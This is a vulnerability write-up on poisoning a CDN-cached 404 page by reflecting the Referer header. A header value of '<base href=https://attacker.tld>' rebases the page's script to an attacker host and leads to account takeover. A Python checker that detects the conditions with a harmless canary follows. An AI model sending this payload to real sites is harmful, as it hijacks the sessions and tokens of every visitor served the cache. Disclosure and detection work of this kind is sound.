Vulnerability Summary
PortSwigger-lab-style cache poisoning via Referer + Akamai WAF bypass → zero-interaction ATO
The endpoint https://id.brand-portal.com/customer/profile/<arbitrary> reflects the Referer request header verbatim inside an HTML 404 page. The CDN in front of the application (Akamai + Varnish) keys the cache only on the URL path: Referer is unkeyed, yet the response stays cached for 60 seconds.
A single unauthenticated request carrying Referer: <base href=https://attacker.tld> is enough to poison that URL for every visitor who follows. The cached page ends with a relative <script src="/static/main.js">. The browser parses the injected <base> tag first, rebases the script to https://attacker.tld/static/main.js, and ends up executing attacker-controlled JavaScript inside the id.brand-portal.com origin: session theft, bearer/JWT exfiltration, full account takeover.
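The three conditions that make this chain work (unescaped reflection of an unkeyed header, a shared-cache TTL with no matching Vary, and a relative script that a leading <base> can rebase) can each be checked from a captured response. The following is an added example, not code from the write-up or the affected portal: the 404 template, the page URL and the canary value are constructed assumptions, and the checker shows how HTML-escaping the header or adding Vary: Referer each break the chain.

```python
import html
import re
from urllib.parse import urljoin

PAGE_URL = "https://id.brand-portal.com/customer/profile/PLACEHOLDER"  # constructed path
BASE_RE = re.compile(r"<base\s+href=[\"']?([^\s\"'>]+)", re.I)
SCRIPT_RE = re.compile(r"<script\s+src=[\"']([^\"']+)[\"']", re.I)

def render_404(path, referer, escape):
    """Constructed 404 template (assumption): reflects Referer, then loads the
    relative /static/main.js the write-up describes. escape=True is the fix."""
    ref = html.escape(referer, quote=True) if escape else referer
    return (f"<html><body><h1>404</h1><p>{path} not found</p>"
            f"<p>Referred by: {ref}</p>"
            '<script src="/static/main.js"></script></body></html>')

def effective_script_url(body, page_url=PAGE_URL):
    """Resolve the relative <script src> the way a browser does: the first
    <base href> in the document overrides the page's own URL."""
    base = BASE_RE.search(body)
    doc_base = urljoin(page_url, base.group(1)) if base else page_url
    script = SCRIPT_RE.search(body)
    return urljoin(doc_base, script.group(1)) if script else None

def cacheable_and_unkeyed(headers, header_name="referer"):
    """Shared-cache view of the response: a positive TTL (or an Age header) with
    no no-store/private, and the probed header absent from Vary."""
    cc = headers.get("Cache-Control", "").lower()
    ttl = re.search(r"(?:s-maxage|max-age)=(\d+)", cc)
    cacheable = "no-store" not in cc and "private" not in cc and (
        (ttl is not None and int(ttl.group(1)) > 0) or headers.get("Age") is not None)
    vary = {v.strip().lower() for v in headers.get("Vary", "").split(",") if v.strip()}
    return bool(cacheable) and header_name not in vary and "*" not in vary

def poisoning_risk(headers, body, canary, page_url=PAGE_URL):
    """True only when the canary lands in the body unescaped, the page's relative
    script now resolves off-origin, and the cache would store and share the result."""
    reflected_raw = canary in body
    url = effective_script_url(body, page_url)
    rebased = url is not None and not url.startswith("https://id.brand-portal.com/")
    return reflected_raw and rebased and cacheable_and_unkeyed(headers)

if __name__ == "__main__":
    canary = "<base href=https://canary.invalid>"  # constructed, non-routable test value
    hdrs = {"Cache-Control": "public, max-age=60"}
    print(effective_script_url(render_404("/x", canary, escape=False)))
    print(poisoning_risk(hdrs, render_404("/x", canary, escape=False), canary))
    print(poisoning_risk(hdrs, render_404("/x", canary, escape=True), canary))
```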